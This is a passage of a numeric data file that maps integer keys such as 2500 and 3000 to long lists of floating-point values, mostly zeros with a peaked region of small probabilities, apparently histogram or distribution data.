0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
2500 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.2527043716421672e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.6875973031081096e-05, 5.8756313606839456e-05, 7.142975082848527e-05, 0.0, 0.00011672177690525046, 5.3665072994390557e-05, 0.0, 5.670820798612232e-05, 5.6171407453593124e-05, 8.915952522288577e-06, 6.0737529624749755e-05, 5.6458577408130776e-05, 6.027656529843115e-05, 0.00012380149642893888, 0.0, 6.0778414779927276e-05, 6.050365407162018e-05, 0.0, 0.0, 0.0, 0.0, 0.000173618538778203, 0.00017462641022580153, 0.00011581276391035723, 0.0, 6.447548285441203e-05, 0.0, 0.0, 5.6156518089437856e-05, 6.086925721448854e-05, 6.713834175429685e-05, 5.643281967380287e-05, 0.00012143362872807678, 0.0001982032855353145, 0.0002498930463178145, 5.9207028510390715e-05, 0.00036320581673364574, 0.00016098106975892063, 0.00012270774278262846, 6.412481668703782e-05, 0.0, 6.525069933047745e-05, 5.7218618852007725e-05, 0.0001184456363233619, 0.00014512193188375637, 0.0002492234231347525, 0.00037166051709743074, 0.00017728582379607368, 5.612607713068669e-05, 0.000186154950566585, 0.00017931598859864442, 0.00018936975473306277, 0.0, 0.00012086404995288832, 5.834434134821663e-05, 5.995040165736012e-05, 0.00017433340138979717, 0.00022555229468749387, 0.00012212427880970453, 0.00029377034041483136, 0.00017406864771925956, 5.743996396640779e-05, 0.0002214157696269485, 0.00031909863777935713, 0.00023889763177986027, 0.00034715688274853713, 0.00018222431424852155, 0.0004344090414684013, 9.292725718085857e-05, 5.747718737679596e-05, 0.0003219444454129963, 0.0004358864819097431, 0.00042574720581071675, 0.0007979118144508739, 0.00018273635255653555, 0.00018822954107662368, 0.0003244185037127495, 0.0002307909789598117, 0.00020313796708065288, 0.00034282816369788987, 0.00029363505495958803, 0.00024010718485890616, 0.0003623870055843908, 7.919655391168982e-05, 0.00036118193662780567, 0.00023322646341847428, 0.00017507064998726666, 0.00017268102823284515, 0.000207539003426738, 0.0004209221515372751, 0.0006570838453403908, 0.0003620150831183635, 0.00023239059875329734, 0.00024588489874007296, 0.0005090212034397195, 0.0003616160481590024, 0.0005085450554246054, 0.0006634756069872493, 0.0004521576483114761, 0.00042247809009150056, 0.000422355824173286, 0.00029434901728404725, 0.0004576608958089761, 0.0006115075016611165, 0.00047749463690949717, 0.0007999524883744241, 0.0005438846842357071, 0.0006741050894312666, 0.00032712777933972765, 0.0007592064621856883, 0.0008594193622591454, 0.0002546392735273039, 0.0011078852457094633, 0.0004357573253323032, 0.0004989599060571529, 0.0008059851047072862, 0.0008691612308409392, 0.00048648272277432346, 0.0008360889751792587, 0.000784278350848889, 0.0004874058979783783, 0.000988328429989765, 0.0006881877963136015, 0.0008727873104091709, 0.000859611123418894, 0.0016069851117896758, 0.0010252753137217855, 0.0011388107320713804, 0.0008450171919496094, 0.0011351144993594776, 0.0012823658094193997, 0.001534781806553682, 0.0008682835893900568, 0.0011202440412340442, 0.001325017812725723, 0.001449384585596138, 0.0014279091362785715, 0.0016083265396207806, 0.001984354314983521, 0.0012893768301094045, 0.0013517383348916228, 0.0016366206251928943, 0.0017676722377990288, 0.0023309375763213695, 0.002011276916984793, 0.0020648992652950045, 0.0017747310429600434, 0.0018889952091189679, 0.002242135884936509, 0.00204578533838532, 0.001750052926039107, 0.0024336464878501017, 0.002508162838494402, 0.0021703079301829413, 0.0022287206370854695, 0.002614095054977752, 0.0020588727432135174, 0.003608578263339309, 0.002395564896063737, 0.002685269816788471, 0.0033453210085257223, 0.0028305213121101996, 0.0029280362593987223, 0.003038560771304696, 0.0031848374859145853, 0.0032125073262378825, 0.0030969481316617323, 0.0033260667753286953, 0.0034707467960782877, 0.0036474687284900158, 0.004008416832847727, 0.00433190579009362, 0.003253016646162978, 0.0037849932670908693, 0.004338935786066316, 0.004204512667392577, 0.004966309601929855, 0.0037368478501926742, 0.004286849050596937, 0.005152128866587596, 0.005068396068784041, 0.004800605798993025, 0.004049559954915841, 0.004538405065758753, 0.006320882179228076, 0.006765899373260682, 0.005396653500719586, 0.005331441686868054, 0.00638344410177711, 0.0058109274126558206, 0.006308419435165834, 0.007198361855437565, 0.005171591135365657, 0.006924204755028043, 0.0067749498905756746, 0.007003528638973082, 0.007343566258816849, 0.0071910736848157025, 0.008921632762774167, 0.008910081940326794, 0.00739271639615767, 0.008012149956502203, 0.009762632804274687, 0.011021958880853082, 0.00993151780642936, 0.008010651878709614, 0.011383211697779552, 0.012025207838783556, 0.011783219521269345, 0.011283384536117, 0.012414911945266477, 0.012078488216488192, 0.013801692087059668, 0.012845939508255931, 0.013813873941535798, 0.015441506653996007, 0.016458966298087695, 0.01716852663397405, 0.018253016394918484, 0.01945562715210805, 0.018371022154410343, 0.020104707029301422, 0.021259428051139125, 0.022174237233112997, 0.020466960411499126, 0.02019675238598072, 0.021861495765178658, 0.02143624776858428, 0.021500235191932258, 0.021739847859455853, 0.020669254099692533, 0.018655620369494103, 0.01917889273738968, 0.015829643983852656, 0.016920263453634815, 0.013666120479013133, 0.011800714454898928, 0.010815465699439324, 0.011573674781985179, 0.009065574548073085, 0.007677637052541463, 0.006237556588220954, 0.007404155305988882, 0.006116782930559059, 0.004552880851854787, 0.003499067336241598, 0.00469235250377001, 0.003525492564227228, 0.0027825055365594403, 0.0019124655562219141, 0.0030537692526228823, 0.0022047392039012867, 0.002340398347558483, 0.0019355529350282158, 0.0013112786000118073, 0.0012999815200307816, 0.0014016181203289086, 0.0012181008206224293, 0.001145575281844973, 0.001370529404984136, 0.0013545599732783307, 0.0008412124400115146, 0.00104811352075027, 0.0009090864029211522, 0.0008498278416288916, 0.0009763590432774868, 0.0009277283023606866, 0.0005816009325774155, 0.0006924246860764817, 0.0005767754281604063, 0.0003672385144490293, 0.00038952498396949045, 0.0005023407612603902, 0.0006947590613646016, 0.0003066833319238427, 0.00051549329840016, 0.00044366267741161535, 0.00045933646867286773, 0.0005410586829190373, 0.0005742700329430706, 6.675684940915698e-05, 0.0005025792334718723, 0.00035871168723516195, 0.00026957235354826, 0.00048452421736505343, 0.0007867678525356498, 0.00033833725445723504, 0.0004453786246908676, 0.0004680208461353548, 0.00019184367452710287, 0.00031066076585971043, 0.0002993857082870633, 0.00024138105652845996, 0.00018498274209042623, 0.00027115112823192824, 0.00030113880972384717, 0.0001240558794842102, 0.0002447051590157659, 0.00017278499408372, 0.00018455657732451702, 0.00029797336553086555, 0.0004715599094893488, 0.00012521676511832535, 0.0001887652984880013, 0.000116839264376364, 0.00019061246261717533, 0.00012409717149991988, 0.00023277245900423757, 6.309915158361301e-05, 0.00011985437793101983, 0.00029721916729675885, 0.00011970765709784098, 0.0, 0.00014272542812671657, 6.610737015073997e-05, 5.811652109173043e-05, 5.959008337310618e-05, 6.044503152856235e-05, 6.675684940915698e-05, 1.7031735898641056e-05, 7.153694126549259e-05, 7.296185774345524e-05, 0.0, 0.00025158589776941184, 0.0001392606211481434, 0.00018640130029049814, 5.812963585143696e-05, 0.0, 0.0, 0.0, 9.368397448762179e-05, 0.0, 0.00012665171893218218, 7.176237229842829e-05, 0.0, 6.610737015073997e-05, 0.0, 0.0, 6.310193901108859e-05, 0.0, 0.0, 0.0, 0.0, 0.00011968798062997765, 0.0, 6.695651405115771e-05, 0.0, 5.959008337310618e-05, 6.309915158361301e-05, 0.0, 0.00011786072669705777, 0.0, 0.0, 6.309915158361301e-05, 6.610737015073997e-05, 5.889464185946684e-05, 0.0, 0.0, 0.0, 0.00013258102731630658, 0.0, 6.603921668330136e-05, 0.0, 6.09980242446104e-05, 0.0, 6.675684940915698e-05, 0.0, 7.32285158675476e-05, 0.0, 5.862166441221555e-05, 0.0, 0.0, 0.0, 0.0, 0.00012537851382137254, 5.862166441221555e-05, 0.0, 0.0, 0.0, 0.0, 0.00018091340961393502, 0.0, 0.0, 7.081424009619922e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3425713688983638e-05, 0.0, 6.139749203432493e-05, 0.0, 5.827064765225512e-05, 0.00011098227328767746, 0.0, 0.0, 5.563681435586601e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8486797335525857e-06, 0.0, 0.0, 0.0, 0.0, 8.046794979162247e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.917755276332753e-05, 0.0, 1.7031735898641056e-05, 0.0, 5.053723743081158e-05, 0.0, 5.917755276332753e-05, 0.0, 0.0, 0.0, 7.483371051598439e-05, 0.0, 0.0, 0.0, 0.0, 2.733468679578698e-05, 7.350562251636985e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.889464185946684e-05, 0.0, 0.0, 0.0, 5.889464185946684e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.862166441221555e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.075295374269102e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.917755276332753e-05, 0.0, 6.09980242446104e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.695651405115771e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.309915158361301e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
3000 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.201530330693707e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.05048786859084e-05, 7.489154650165801e-05, 0.0, 0.0, 0.0, 5.975489547814596e-05, 0.0, 0.0, 0.0, 0.0, 6.197172745067125e-05, 6.861405014881978e-05, 5.973173314065296e-05, 6.202000510520979e-05, 6.076458102435491e-05, 0.0, 0.0, 6.106723914805931e-05, 5.220001378938466e-05, 0.0, 0.00018983789313918486, 6.412606895996446e-05, 0.0001307374704037849, 0.0, 0.0, 6.517211898544153e-05, 6.789322492577661e-05, 0.0, 0.00012677374216356175, 0.0, 6.143864215201276e-05, 6.002650122696514e-05, 7.31457390200607e-05, 6.116139717473565e-05, 0.0001322213442677969, 0.0, 4.4324447975649114e-05, 0.00013162854661931983, 7.329449259012801e-05, 6.246478643340065e-05, 0.00019536535257732297, 0.0002611875403366195, 0.0, 0.00012874901497768353, 6.0612356033132983e-05, 0.00025367759182491303, 0.0002537726042801436, 6.310348398381106e-05, 0.00010789604651085489, 0.00019173423628469116, 7.868222610618037e-05, 0.00017858812549295279, 0.00033985609558593216, 0.00012230606707960387, 0.00019740174388654117, 0.0003818694900905442, 0.00012593905823260612, 6.25987315360109e-05, 0.00021355788441361587, 6.91384739831628e-05, 8.014071123600952e-05, 0.00020840053413047766, 0.00012601815390448357, 0.0002513654788624687, 7.173393010153702e-05, 0.00020811317271911844, 0.00023150037627779838, 0.00013209268197487625, 0.00019954705286540393, 0.0003710185403987342, 0.000209255431399802, 0.0003639648469700897, 0.00012629036019451515, 0.00017528971879688995, 0.00029402894214093574, 0.00024856277743642895, 0.0001689562256378318, 0.00019560726815449482, 0.00018747431916553138, 6.52983156416771e-05, 0.0004413927914884534, 0.0005369867268509912, 0.0005466224936056262, 0.00025091603967804504, 0.00019096333666592113, 0.00031279279861552565, 0.00026781103142943275, 0.00041908253897422043, 0.0003390971286722281, 0.00018910040900055862, 0.0001248938626356833, 0.000327195358802384, 0.0003240212983144307, 0.0003793276872029269, 0.00033433193668323786, 0.00045147629833530137, 0.0002975769982131985, 0.0005187878868907436, 0.0003936078736910237, 0.0006385207276417299, 0.00045014729574980493, 0.0005850838479596883, 0.0006670739136531703, 0.0004957888966075155, 0.00043576621833802445, 0.0003301955650505711, 0.0005588796276348486, 0.0005095773619038764, 0.0004130582610677143, 0.0009933158668976004, 0.0005874764041499013, 0.00037663816094195615, 0.0003925502180845557, 0.0009262716412428994, 0.00065824472745373, 0.0005041370248835766, 0.0007919977349951894, 0.0006105630050958559, 0.0005459835568152206, 0.000775368582820492, 0.0008583396692028007, 0.000589820799864349, 0.0009145855584348367, 0.0007370361251168968, 0.0008486882786117453, 0.0017053662746920716, 0.0007735698886526122, 0.001312931751116208, 0.00112035554628683, 0.0007901117035817204, 0.0012288323112676295, 0.0007815990563081542, 0.0012226426159930243, 0.000996887007188174, 0.001116873539983034, 0.0012875604375109308, 0.0012294791380954274, 0.00090233123669617, 0.0007020812283706284, 0.0011301926261737397, 0.0014602881205520392, 0.0018586450155613583, 0.001887792219833496, 0.0016391319887173958, 0.0018976911701126299, 0.0021888747968136896, 0.0007350949415608644, 0.002602159955045817, 0.0020363945902238416, 0.002381598100062964, 0.0021082393958570243, 0.0021235563801299683, 0.0016383868879585148, 0.001556628601878327, 0.002427179861627185, 0.001832753037607377, 0.0028588389639662396, 0.0021842679524068185, 0.0021207495579170727, 0.003622601145544412, 0.0028866484553640766, 0.003362753310121237, 0.0032750020328669747, 0.0021101786264335043, 0.003085868618511978, 0.0019380375403307937, 0.001968611200868099, 0.0028754477270344085, 0.0037972575130724166, 0.0034384426731823474, 0.0037720272045908324, 0.0035507986805079278, 0.0034568397405671768, 0.0037124403922978748, 0.0037137006109435313, 0.003217321328617286, 0.0031632359816046226, 0.004256098028585215, 0.003460609459818652, 0.003556687929408172, 0.00461622402082767, 0.003999928044255363, 0.005230794813382454, 0.004981469944265037, 0.004686624090307074, 0.0047617553699312535, 0.005353925643256887, 0.004540795575834777, 0.004646934233695288, 0.005824879944099751, 0.0050865880531305785, 0.005088071692637044, 0.004943554018040405, 0.007102999756572936, 0.004763245258972287, 0.004703779062696494, 0.005335691376247557, 0.006733658513133097, 0.0063252401799458735, 0.00605694578607719, 0.008087765166512833, 0.0069304126099404275, 0.007772266163190958, 0.007744841955599244, 0.00800064290491285, 0.00805984162110913, 0.008793858830433725, 0.006970918968243535, 0.008344353557182018, 0.008602231226832601, 0.00801161583770751, 0.010167795256998027, 0.010052323231736795, 0.009765195865447157, 0.011305476778563897, 0.010684059308413036, 0.010862282285319052, 0.01205146872107442, 0.01385839165112004, 0.014519059948079277, 0.013324588905893128, 0.012395198121947294, 0.014466692598119382, 0.017905384002777542, 0.015873331589171612, 0.01676752624433685, 0.019629018135727247, 0.01857719896959243, 0.02014353981690467, 0.019834447836422006, 0.021889577281374084, 0.021221199558571643, 0.02146242659327245, 0.023092870166556555, 0.020290667609613674, 0.021753202437842945, 0.021982922829496977, 0.021068848404870628, 0.01965523743305423, 0.019389370983365253, 0.0175620520723032, 0.014852360125664913, 0.013809634032326677, 0.012526025878595791, 0.011721735777820251, 0.009231585605884943, 0.008930238048639062, 0.008487371655959043, 0.006928364637462463, 0.006281445316553035, 0.004889419612181383, 0.0045915899179438825, 0.00373849126466825, 0.0031022764590437828, 0.002294592704759404, 0.0027145453351838673, 0.0023036856213176178, 0.0029380768127551145, 0.0016217153170679365, 0.00157442946366536, 0.001648158816447552, 0.0016672656747209527, 0.0013901289706302357, 0.001304102252440039, 0.001002898903204317, 0.0010541386027705807, 0.0011503307357700584, 0.0011985806579989453, 0.0008635305326150602, 0.0006808122654942132, 0.0005237018178024546, 0.0005703919733819182, 0.0009945849911300161, 0.0008044871173527986, 0.00021278145786271218, 0.00047115561397513957, 0.0007283670051215818, 0.00021901923549390084, 0.00026503000807642606, 0.0004578826962210554, 0.00037817332004901766, 0.0004903553559560586, 0.0001937495940041286, 0.0002625111136389599, 0.0004327647231233327, 6.421861089606109e-05, 0.00018917751263329249, 0.00031491590221687616, 0.0002306286833843223, 0.00039938861504732934, 0.00033105241529944796, 0.0002993351680553633, 0.0006488561297912632, 0.00012741025725932222, 0.00015327941464723222, 0.0002141330173620403, 0.0005832178150568373, 0.00025048083771455937, 0.00019217598072967786, 0.0005114064444335936, 0.00013919587367027962, 0.0003881052756825893, 0.00022900802283245107, 0.0001949778228447145, 0.00013016826474830236, 0.00010937437391293774, 0.00010937437391293774, 0.0, 0.00012915335009934151, 0.00033071357334708406, 0.00019927769792551904, 0.0002018876793293152, 8.839906104204087e-05, 0.0002582243039913618, 6.535999561839488e-05, 6.269561396916301e-05, 9.348720749473519e-05, 0.00013114800623552215, 0.0, 0.0, 0.00025192684330504784, 8.685108062421706e-05, 6.20313470339611e-05, 0.0, 0.00012593460543922633, 0.00020893268199895094, 0.00014746745491277938, 0.0, 0.0, 4.220289211059398e-05, 0.0, 0.00011489700949158109, 2.3881107205065802e-05, 0.0, 0.0001270416714283733, 0.0001910181958615517, 0.0, 0.0, 7.824956301611295e-05, 0.0, 0.0, 7.03738409640132e-05, 0.0001248640601677117, 9.854747638492937e-06, 6.20313470339611e-05, 0.0, 6.535999561839488e-05, 0.0, 6.337099335801882e-05, 7.127778731479931e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00018212795952129936, 0.0, 0.0001264327226389968, 0.0, 0.0, 0.0, 0.0, 0.0001264833341041006, 0.0, 0.0, 0.0, 0.00012453001278014926, 7.676077740852631e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 6.617956226700172e-06, 7.603972271038571e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 2.926859415744966e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00012549544869214677, 0.0, 0.0, 8.685108062421706e-05, 0.0, 0.0, 6.717148180234375e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00014019217642410487, 0.0, 0.0001330694549331762, 0.0, 0.0, 0.0, 0.0, 0.0, 6.240502037664436e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.3798835147409706e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 